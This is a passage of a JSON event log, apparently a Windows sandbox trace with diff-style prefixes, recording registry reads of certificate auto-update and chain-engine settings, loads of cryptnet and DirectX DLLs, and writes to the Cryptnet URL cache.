"\\x03\\x00\\x00\\x00\\x01\\x00\\x01\\x00\\x14\\x00\\x00\\x00't\\x81H\\xbb\\xe6zC\\xcd\\xbf\\xecl7\\x84\\x86,\\xe14\\xe6\\xea\"\\x00\\x00\\x00\\x01\\x00\\x01\\x00*\\x02\\x00\\x000\\x82\\x02&\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x07\\x02\\xa0\\x82\\x02\\x170\\x82\\x02\\x13\\x02\\x01\\x011\\x000\\x82\\x02\\x08\\x06\t+\\x06\\x01\\x04\\x01\\x827\n\\x01\\xa0\\x82\\x01\\xf90\\x82\\x01\\xf50\\x0c\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x03\\x1e\\x04(D\\x00i\\x00s\\x00a\\x00l\\x00l\\x00o\\x00w\\x00e\\x00d\\x00C\\x00e\\x00r\\x00t\\x00_\\x00O\\x00S\\x00_\\x001\\x00\\x00\\x00\\x02\\x08\\x01\\xcd??\\xac\\xc3\\xee\\x89\\x17\r120531151137Z0\\x0e\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x0b\\x0f\\x05\\x000\\x82\\x01\\x900\\x12\\x04\\x10%\\xfbz]\\x86\\xf7/^g(\\x8fys\\x05\\xfe\\x940\\x12\\x04\\x10o-Ce\\xc1\\x02\\x1f[\\x8bc\\xef\\x13+\\xc3\\xb3`0\\x12\\x04\\x10\\xad\\x11\\xdb\\xb7l\\x9c\\xf1\\xab\\x99\\x98\\xcd\\x84.\\xc1vs0\\x12\\x04\\x10\\xdf\\xbd\\xd7/\\x99\\xc3\\xb6Jy~Z\\xc9mY\\xbeV0\\x12\\x04\\x10\\xc6h\\x15K\\xe9^\\x16\\xad\\xbc2\\x1a\\xbc1n8J0\\x12\\x04\\x1079.\\x83=\\xc6\\x05\\xdd{8$G9\\x93\\x9e\\xe30\\x12\\x04\\x101y\\xfeKW&\\xd8\\xdb*\\xaf=\\xf9X\\xc9k\\x970\\x12\\x04\\x10\\xc3Z\\x97\\xc8\\x0fh}\\xc3\\xc1\\x08\\xc6\\xa33\\x9bhF0\\x12\\x04\\x10!\\x18\\xa4\\xc6\\xf7\\x18\\xcf\\xc7\\xd6\\xd8x\\x8cSt\\xd3)0\\x12\\x04\\x10Rj9\\xc0M\\x15\\x86-B\\x7f\\xd9%\\xaf\\x036\\x900\\x12\\x04\\x10<6\\xe1h\\xab\\xcc\\x85\\x96c\\xedG\\xa0\\xc0Z\\xeey0\\x12\\x04\\x10\\x01\\x9e}V\\xd6\r\\xb9\\xad\\xec@\\xb9g\\xb1\\xbc\\xba\\x9f0\\x12\\x04\\x106\\xcd\\xe9\\x9a\\xb8s\\x7f\\x86(|X7\\x04\\xc9^\\x160\\x12\\x04\\x10&\\x99\nwX~\\xd8d\\x01\\x84\\xc4\\x93f\\xac\\xb0u0\\x12\\x04\\x10\\xf6\\x9d\"\\xae\\x1e\\xd6\\x15\\xb1\\xb9\\xe3\\x90\\xe3\\x10\\xbb\\xbb10\\x12\\x04\\x10\\xeb\\xe9\n\\xd1\\x01\\xd3\\x80+\\x8aL\\x91<" + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,687", + "eid": 363, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\DisallowedCertLastSyncTime", + "content": "\\xec\\xdbPA\\xa1\\x8f\\xdb\\x01" + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,687", + "eid": 364, + "data": { + "regkey": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\DisallowedCertLastSyncTime", + "content": "\\xd0\\xae\\x0bA\\xa1\\x8f\\xdb\\x01" + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,687", + "eid": 365, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\DisallowedCertEncodedCtl", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,687", + "eid": 366, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\DisallowedCertEncodedCtl", + "content": "0\\x82\\x16\\xc8\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x07\\x02\\xa0\\x82\\x16\\xb90\\x82\\x16\\xb5\\x02\\x01\\x011\\x0f0\r\\x06\t`\\x86H\\x01e\\x03\\x04\\x02\\x01\\x05\\x000\\x82\\x07$\\x06\t+\\x06\\x01\\x04\\x01\\x827\n\\x01\\xa0\\x82\\x07\\x150\\x82\\x07\\x110\\x0c\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x03\\x1e\\x048D\\x00i\\x00s\\x00a\\x00l\\x00l\\x00o\\x00w\\x00e\\x00d\\x00C\\x00e\\x00r\\x00t\\x00_\\x00A\\x00u\\x00t\\x00o\\x00U\\x00p\\x00d\\x00a\\x00t\\x00e\\x00_\\x001\\x00\\x00\\x00\\x02\\x08\\x01\\xdbFv^\\xc4\\xfa\\xd2\\x17\r241204180014Z0\\x0e\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x0b\\x0f\\x05\\x000\\x82\\x06\\x9c0\\x12\\x04\\x10%\\xfbz]\\x86\\xf7/^g(\\x8fys\\x05\\xfe\\x940\\x12\\x04\\x10o-Ce\\xc1\\x02\\x1f[\\x8bc\\xef\\x13+\\xc3\\xb3`0\\x12\\x04\\x10\\xad\\x11\\xdb\\xb7l\\x9c\\xf1\\xab\\x99\\x98\\xcd\\x84.\\xc1vs0\\x12\\x04\\x10\\xdf\\xbd\\xd7/\\x99\\xc3\\xb6Jy~Z\\xc9mY\\xbeV0\\x12\\x04\\x10\\xc6h\\x15K\\xe9^\\x16\\xad\\xbc2\\x1a\\xbc1n8J0\\x12\\x04\\x1079.\\x83=\\xc6\\x05\\xdd{8$G9\\x93\\x9e\\xe30\\x12\\x04\\x101y\\xfeKW&\\xd8\\xdb*\\xaf=\\xf9X\\xc9k\\x970\\x12\\x04\\x10\\xc3Z\\x97\\xc8\\x0fh}\\xc3\\xc1\\x08\\xc6\\xa33\\x9bhF0\\x12\\x04\\x10!\\x18\\xa4\\xc6\\xf7\\x18\\xcf\\xc7\\xd6\\xd8x\\x8cSt\\xd3)0\\x12\\x04\\x10Rj9\\xc0M\\x15\\x86-B\\x7f\\xd9%\\xaf\\x036\\x900\\x12\\x04\\x10<6\\xe1h\\xab\\xcc\\x85\\x96c\\xedG\\xa0\\xc0Z\\xeey0\\x12\\x04\\x10\\x01\\x9e}V\\xd6\r\\xb9\\xad\\xec@\\xb9g\\xb1\\xbc\\xba\\x9f0\\x12\\x04\\x106\\xcd\\xe9\\x9a\\xb8s\\x7f\\x86(|X7\\x04\\xc9^\\x160\\x12\\x04\\x10&\\x99\nwX~\\xd8d\\x01\\x84\\xc4\\x93f\\xac\\xb0u0\\x12\\x04\\x10\\xf6\\x9d\"\\xae\\x1e\\xd6\\x15\\xb1\\xb9\\xe3\\x90\\xe3\\x10\\xbb\\xbb10\\x12\\x04\\x10\\xeb\\xe9\n\\xd1\\x01\\xd3\\x80+\\x8aL\\x91<\\xac\\xeejW0\\x12\\x04\\x10\\x1e%\\xf2N\\xdf" + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,687", + "eid": 367, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\AutoFlags", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,687", + "eid": 368, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\DisableAutoFlushProcessNameList", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,687", + "eid": 369, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\AutoFlushFirstDeltaSeconds", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,687", + "eid": 370, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\AutoFlushNextDeltaSeconds", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,687", + "eid": 371, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\SyncDeltaTime", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,687", + "eid": 372, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\Flags", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,687", + "eid": 373, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\RootDirUrl", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,687", + "eid": 374, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\LastSyncTime", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,687", + "eid": 375, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\EncodedCtl", + "content": null + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 21:41:29,687", + "eid": 376, + "data": { + "file": "C:\\Windows\\System32\\cryptnet.dll", + "pathtofile": null, + "moduleaddress": "0x74200000" + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 21:41:29,687", + "eid": 377, + "data": { + "file": "cryptnet.dll", + "pathtofile": null, + "moduleaddress": "0x74200000" + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,687", + "eid": 378, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\SyncDeltaTime", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,687", + "eid": 379, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\RootDirUrl", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,687", + "eid": 380, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\Flags", + "content": null + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 21:41:29,703", + "eid": 381, + "data": { + "file": "C:\\Windows\\System32\\cryptnet.dll", + "pathtofile": null, + "moduleaddress": "0x74200000" + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,703", + "eid": 382, + "data": { + "regkey": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\Local AppData", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,703", + "eid": 383, + "data": { + "regkey": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\Local AppData", + "content": "%USERPROFILE%\\AppData\\Local" + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,703", + "eid": 384, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList\\S-1-5-21-508823978-2055017376-4061076391-1001\\ProfileImagePath", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,703", + "eid": 385, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList\\S-1-5-21-508823978-2055017376-4061076391-1001\\ProfileImagePath", + "content": "C:\\Users\\pacop" + } + }, + { + "event": "read", + "object": "file", + "timestamp": "2025-03-07 21:41:29,703", + "eid": 386, + "data": { + "file": "C:\\Users\\pacop\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506" + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,718", + "eid": 387, + "data": { + "regkey": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\Local AppData", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,718", + "eid": 388, + "data": { + "regkey": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\Local AppData", + "content": "%USERPROFILE%\\AppData\\Local" + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,718", + "eid": 389, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList\\S-1-5-21-508823978-2055017376-4061076391-1001\\ProfileImagePath", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,718", + "eid": 390, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList\\S-1-5-21-508823978-2055017376-4061076391-1001\\ProfileImagePath", + "content": "C:\\Users\\pacop" + } + }, + { + "event": "write", + "object": "file", + "timestamp": "2025-03-07 21:41:29,718", + "eid": 391, + "data": { + "file": "C:\\Users\\pacop\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506" + } + }, + { + "event": "write", + "object": "file", + "timestamp": "2025-03-07 21:41:29,718", + "eid": 392, + "data": { + "file": "C:\\Users\\pacop\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506" + } + }, + { + "event": "write", + "object": "file", + "timestamp": "2025-03-07 21:41:29,718", + "eid": 393, + "data": { + "file": "C:\\Users\\pacop\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506" + } + }, + { + "event": "write", + "object": "file", + "timestamp": "2025-03-07 21:41:29,718", + "eid": 394, + "data": { + "file": "C:\\Users\\pacop\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506" + } + }, + { + "event": "write", + "object": "file", + "timestamp": "2025-03-07 21:41:29,718", + "eid": 395, + "data": { + "file": "C:\\Users\\pacop\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506" + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 21:41:29,718", + "eid": 396, + "data": { + "file": "DDRAW.DLL", + "pathtofile": null, + "moduleaddress": null + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 21:41:29,718", + "eid": 397, + "data": { + "file": "D3D8.DLL", + "pathtofile": null, + "moduleaddress": null + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 21:41:29,718", + "eid": 398, + "data": { + "file": "D3D9.DLL", + "pathtofile": null, + "moduleaddress": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 399, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\EncodedCtl", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 400, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\EncodedCtl", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 401, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\EncodedCtl", + "content": "0\\x83\\x02\\xdf\\xe5\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x07\\x02\\xa0\\x83\\x02\\xdf\\xd50\\x83\\x02\\xdf\\xd0\\x02\\x01\\x011\\x0f0\r\\x06\t`\\x86H\\x01e\\x03\\x04\\x02\\x01\\x05\\x000\\x83\\x02\\xd0/\\x06\t+\\x06\\x01\\x04\\x01\\x827\n\\x01\\xa0\\x83\\x02\\xd0\\x1f0\\x83\\x02\\xd0\\x1a0\\x0c\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x03\t\\x02\t\\x14\\x01\\xdbq\\x1e\\x130p\\xaf\\x17\r250128004632Z0\t\\x06\\x05+\\x0e\\x03\\x02\\x1a\\x05\\x000\\x83\\x02\\xbe\\xa70\\x82\\x01D\\x04\\x14\\xcd\\xd4\\xee\\xae`\\x00\\xac\\x7f@\\xc3\\x80,\\x17\\x1e0\\x14\\x800\\xc0r1\\x82\\x01*0\\x18\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x0bh1\n\\x04\\x08\\x00\\x80\\xc8+h\\x86\\xd7\\x010\\x18\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x0b~1\n\\x04\\x08\\x00\\x00\\xd9\\xb5D\\xc1\\xd2\\x010\\x1e\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x0bi1\\x10\\x04\\x0e0\\x0c\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x03\\x020 \\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x0b\\x1d1\\x12\\x04\\x10\\xf0\\xc4\\x02\\xf0@N\\xa9\\xad\\xbf%\\xa0=\\xdf,\\xa6\\xfa0$\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x0b\\x141\\x16\\x04\\x14\\x0e\\xac\\x82`@V'\\x97\\xe5%\\x13\\xfc*\\xe1\nS\\x95Y\\xe4\\xa400\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x0bb1\"\\x04 \\x88]\\xe6L4\\x0e>\\xa7\\x06X\\xf0\\x1e\\x11E\\xf9W\\xfc\\xda'\\xaa\\xbe\\xea\\x1a\\xb9\\xfa\\xa9\\xfd\\xb0\\x10-@w0Z\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x0b\\x0b1L\\x04JM\\x00i\\x00c\\x00r\\x00o\\x00s\\x00o\\x00f\\x00t\\x00 \\x00R\\x00o\\x00o\\x00t\\x00 \\x00C\\x00e\\x00r\\x00t\\x00i\\x00f\\x00i\\x00c\\x00a\\x00t\\x00e\\x00 \\x00A\\x00u\\x00t\\x00h\\x00o\\x00r\\x00i\\x00t\\x00y\\x00\\x00\\x000\\x82\\x01,\\x04\\x14\\x18\\xf7\\xc1\\xfc\\xc3\t\\x02\\x03\\xfd[\\xaa/\\x86\\x1auIv\\xc8\\xdd%1\\x82\\x01\\x120\\x18\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x0bh1\n\\x04\\x08\\x00\\x006\\x04M\\xdf\\xd3\\x01" + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 402, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\DisallowedCertSyncDeltaTime", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 403, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\DisableMandatoryBasicConstraints", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 404, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\DisableCANameConstraints", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 405, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\DisableUnsupportedCriticalExtensions", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 406, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\MaxAIAUrlCountInCert", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 407, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\MaxAIAUrlRetrievalCountPerChain", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 408, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\MaxUrlRetrievalByteCount", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 409, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\MaxAIAUrlRetrievalByteCount", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 410, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\MaxAIAUrlRetrievalCertCount", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 411, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\MaxVerifySignatureCountPerChain", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 412, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\MaxIssuerDepth", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 413, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\MaxPathCountPerChain", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 414, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\CryptnetPreFetchTriggerPeriodSeconds", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 415, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\EnableWeakSignatureFlags", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 416, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\MinRsaPubKeyBitLength", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 417, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\WeakRsaPubKeyTime", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 418, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\ChainCacheResyncFiletime", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 419, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\EnableStrictChecksFlags", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 420, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\WeakMD5ThirdPartyFlags", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 421, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\Default\\WeakMD5ThirdPartyFlags", + "content": "18446744071705722880" + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 422, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\Default\\WeakMD5ThirdPartyAfterTime", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 423, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\Default\\WeakMD5ThirdPartyAfterTime", + "content": "\\x00\\xc0)\\xb8C\\x9a\\xc9\\x01" + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 424, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\WeakMD5AllFlags", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 425, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\CI\\Config\\WeakMD5AllFlags", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 426, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\Default\\WeakMD5AllFlags", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 427, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\CI\\Config\\Default\\WeakMD5AllFlags", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 428, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\WeakMD5ThirdPartySha256Allow", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 429, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\WeakMD5AllSha256Allow", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 430, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\Default\\WeakMD5ThirdPartySha256Allow", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 431, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\Default\\WeakMD5ThirdPartySha256Allow", + "content": "\\x00\\x00\\x001P\\xd3b0\\x756a\\x5410\\xac00\\x1b\\x1000t\\x2a6c" + } + }, 